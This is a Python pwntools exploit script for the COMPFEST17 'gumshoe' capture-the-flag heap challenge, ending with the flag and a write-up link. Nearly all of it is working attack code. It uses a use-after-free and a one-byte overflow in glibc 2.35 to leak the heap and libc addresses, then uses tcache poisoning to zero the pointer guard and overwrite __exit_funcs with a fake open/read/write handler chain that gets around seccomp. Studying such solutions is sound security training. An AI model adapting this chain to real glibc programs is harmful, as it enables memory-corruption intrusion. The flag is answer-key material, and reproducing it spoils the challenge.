from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = gdb.debug('./chall_patched', gdbscript='''
    continue
''')

# p = remote('ctf.compfest.id', 7002)

# malloc a chunk of size (0x20-0x40) at index (0-2) and read corresponding bytes of data at most into it (one byte overflow, null terminated)
def add_evidence(slot, length, evidence):
    p.sendlineafter(b"> ", b'1')
    p.sendlineafter(b"Put into which backpack slot?\n> ", str(slot).encode())
    p.sendlineafter(b"How long is the evidence's description?\n> ", str(length).encode())
    p.sendafter(b"Describe the evidence\n> ", evidence)

# write data of a chunk at index as a string by puts function
def view_evidence(slot):
    p.sendlineafter(b"> ", b'2')
    p.sendlineafter(b"View which backpack slot?\n> ", str(slot).encode())
    return p.recvline().strip()

# free a chunk at index, not setting its pointer to NULL (use-after-free vulnerability)
def remove_evidence(slot):
    p.sendlineafter(b"> ", b'3')
    p.sendlineafter(b"Remove which backpack slot?\n> ", str(slot).encode())

# exit program through exit(0)
def finish():
    p.sendlineafter(b"> ", b'4')

def pointer_guard_encrypt(decrypted: int, pointer_guard: int):
    r_bits = 0x11
    max_bits = 64
    encrypted = ((decrypted^pointer_guard)<<(r_bits%max_bits))&(2**max_bits-1)|(((decrypted^pointer_guard)&(2**max_bits-1))>>(max_bits-(r_bits%max_bits)))
    return encrypted


# syscalls of execve, execveat, fork, vfork, and clone are prohibited by seccomp filter

# available vulnerabilities in glibc 2.35:
# 1. double free into different tcache bins is allowed
# 2. rdx register is loaded with value 1 before each exit function gets called

# usable characteristics of exit function list:
# 1. exit function list is last in first out
# 2. a registered exit function can receive 2 arguments (exit code and user supplied argument), whose order is determined by function's flavor, where flavor 4 (ef_cxa) passes 2 arguments with order (exit code, user supplied argument) while flavor 2 (ef_on) passes 2 arguments with order (user supplied argument, exit code)

glibc_e = ELF('./libc.so.6')

# Stage 1: leak heap base address
# tcache bin of size 0x30 has only 2 chunks, so exploit these 2 chunks to leak heap address
add_evidence(0, 0x28, b'0') # heap_base_addr+0x300
add_evidence(1, 0x28, b'1') # heap_base_addr+0x460
remove_evidence(0) # heap_base_addr+0x300
heap_base_addr = u64(view_evidence(0).ljust(8, b'\x00'))<<12 # heap_base_addr+0x300
log.info(f"heap base address: {hex(heap_base_addr)}")

# Stage 2: leak glibc base address
# right after chunk of size 0x30 at heap_base_addr+0x300, chunk of size 0x20 at heap_base_addr+0x330 and chunk of size 0xd0 at heap_base_addr+0x350 are adjacent and have a sum size of 0xf0, so exploit these 3 chunks to leak glibc address
for _ in range(8):
    add_evidence(1, 0x18, b'1') # heap_base_addr+0x330
# overwrite size field of chunk of size 0x20 at heap_base_addr+0x330 to 0xf0 through one byte overflow
add_evidence(0, 0x28, b'0'*0x28+b'\xf1') # heap_base_addr+0x300
# free chunk of fake size 0xf0 at heap_base_addr+0x330 into unsorted bin
remove_evidence(1) # heap_base_addr+0x330
# clear all other 0xf0 size chunks in unsorted bin except chunk at heap_base_addr+0x330 to place a glibc address into first qword of it
for _ in range(25):
    add_evidence(2, 0x28, b'2')
glibc_base_addr = u64(view_evidence(1).ljust(8, b'\x00'))-0x21adc0 # heap_base_addr+0x330
log.info(f"glibc base address: {hex(glibc_base_addr)}")
tls_base_addr = glibc_base_addr-0x28c0

# Stage 3: clear freed chunks in bins generated by seccomp filter
# clear tcache bin and fastbin of size 0x20
for _ in range(11):
    add_evidence(2, 0x18, b'2')
# clear unsorted bin of size 0x30
for _ in range(5):
    add_evidence(2, 0x28, b'2')
# clear tcache bin and fastbin of size 0x40
for _ in range(10):
    add_evidence(2, 0x38, b'2')

# Stage 4: tcache poisoning after double free to zero pointer_guard in tls
add_evidence(0, 0x38, b'0') # heap_base_addr+0x2310
add_evidence(1, 0x38, b'1'*0x28+b'\x51') # heap_base_addr+0x2350
add_evidence(2, 0x38, b'2') # heap_base_addr+0x2390
remove_evidence(2) # heap_base_addr+0x2390
remove_evidence(1) # heap_base_addr+0x2350
remove_evidence(0) # heap_base_addr+0x2310
# now tcache bin of size 0x40 looks like heap_base_addr+0x2310->heap_base_addr+0x2350->heap_base_addr+0x2390
add_evidence(0, 0x38, b'0'*0x38+b'\x31') # heap_base_addr+0x2310
# now tcache bin of size 0x40 looks like heap_base_addr+0x2350->heap_base_addr+0x2390
remove_evidence(1) # heap_base_addr+0x2350
# now tcache bin of size 0x30 looks like heap_base_addr+0x2350
add_evidence(1, 0x28, p64(((tls_base_addr+0x30)^(heap_base_addr+0x2350)>>12))) # heap_base_addr+0x2350
# now tcache bin of size 0x40 looks like heap_base_addr+0x2350->tls_base_addr+0x30
add_evidence(1, 0x38, b'1') # heap_base_addr+0x2350
# now tcache bin of size 0x40 looks like tls_base_addr+0x30
add_evidence(2, 0x38, p64(0)) # tls_base_addr+0x30
# now pointer_guard in tls is overwritten with 0

# Stage 5: make fake exit function list
add_evidence(0, 0x28, b'./flag.txt\x00')
filename_addr = heap_base_addr+0x23d0
flag_addr = heap_base_addr+0x23d8
fake_initial_addr = heap_base_addr+0x2400
fake_initial = p64(4)+p64(pointer_guard_encrypt(glibc_base_addr+glibc_e.sym.open, 0))+p64(filename_addr)+p64(0) # open(filename_addr, 0)
fake_initial = p64(4)+p64(pointer_guard_encrypt(glibc_base_addr+glibc_e.sym.dup2, 0))+p64(3)+p64(0)+fake_initial # dup2(3, 0)
for i in range(0x20):
    fake_initial = p64(2)+p64(pointer_guard_encrypt(glibc_base_addr+glibc_e.sym.read, 0))+p64(flag_addr+i)+p64(0)+fake_initial # read(0, flag_addr+i, 1)
fake_initial = p64(4)+p64(pointer_guard_encrypt(glibc_base_addr+glibc_e.sym.dup2, 0))+p64(1)+p64(0)+fake_initial # dup2(1, 0)
for i in range(0x20):
    fake_initial = p64(2)+p64(pointer_guard_encrypt(glibc_base_addr+glibc_e.sym.write, 0))+p64(flag_addr+i)+p64(0)+fake_initial # write(0, flag_addr+i, 1)
fake_initial = p64(0)+p64(0x43)+fake_initial # totally 0x43 exit functions in exit function list
# write fake exit function list to heap area starting from heap_base_addr+0x2400
add_evidence(0, 0x28, fake_initial[0:0x28])
for i in range(0x21):
    add_evidence(0, 0x38, fake_initial[0x30+i*0x40:0x30+0x38+i*0x40])

# Stage 6: tcache poisoning after double free to fake exit function list
add_evidence(0, 0x38, b'0') # heap_base_addr+0x2c70
add_evidence(1, 0x38, b'0'*0x28+b'\x51') # heap_base_addr+0x2cb0
add_evidence(2, 0x38, b'0') # heap_base_addr+0x2cf0
remove_evidence(2) # heap_base_addr+0x2cf0
remove_evidence(1) # heap_base_addr+0x2cb0
remove_evidence(0) # heap_base_addr+0x2c70
# now tcache bin of size 0x40 looks like heap_base_addr+0x2c70->heap_base_addr+0x2cb0->heap_base_addr+0x2cf0
add_evidence(0, 0x38, b'0'*0x38+b'\x31') # heap_base_addr+0x2c70
# now tcache bin of size 0x40 looks like heap_base_addr+0x2cb0->heap_base_addr+0x2cf0
remove_evidence(1) # heap_base_addr+0x2cb0
# now tcache bin of size 0x30 looks like heap_base_addr+0x2cb0
add_evidence(1, 0x28, p64(((glibc_base_addr+glibc_e.symbols['__exit_funcs']-8)^(heap_base_addr+0x2cb0)>>12))) # heap_base_addr+0x2cb0
# now tcache bin of size 0x40 looks like heap_base_addr+0x2cb0->glibc_base_addr+glibc_e.symbols['__exit_funcs']-8
add_evidence(1, 0x38, b'0') # heap_base_addr+0x2cb0
# now tcache bin of size 0x40 looks like glibc_base_addr+glibc_e.symbols['__exit_funcs']-8
add_evidence(2, 0x38, p64(0)+p64(fake_initial_addr)) # glibc_base_addr+glibc_e.symbols['__exit_funcs']-8
# now __exit_funcs is overwritten with address of fake exit function list

# Stage 7: ORW using exit function list
# exit program through exit(0) to trigger ORW
finish()

p.interactive()

# https://github.com/ctf-compfest-17/quals-challenges/tree/main/Binary-Exploitation/gumshoe/writeup
# COMPFEST17{3X1T_ORw_cha1n}